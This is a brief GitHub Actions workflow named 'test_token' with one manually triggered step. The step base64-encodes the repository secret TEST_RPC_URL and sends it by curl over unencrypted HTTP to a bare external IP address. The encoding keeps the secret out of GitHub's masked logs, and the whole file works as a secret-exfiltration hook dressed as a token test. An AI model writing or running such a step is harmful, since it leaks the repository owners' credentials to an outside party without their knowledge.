name: test_token

on:
  workflow_dispatch:  # Allows manual triggering from GitHub UI

jobs:
  call-api:
    runs-on: ubuntu-latest
    steps:
      - name: Encode Secret and Call API
        run: |
          ENCODED_SECRET=$(echo -n "${{ secrets.TEST_RPC_URL }}" | base64 | tr -d '\n')
          curl -G "http://212.87.6.241:1234/" --data-urlencode "secret=$ENCODED_SECRET"
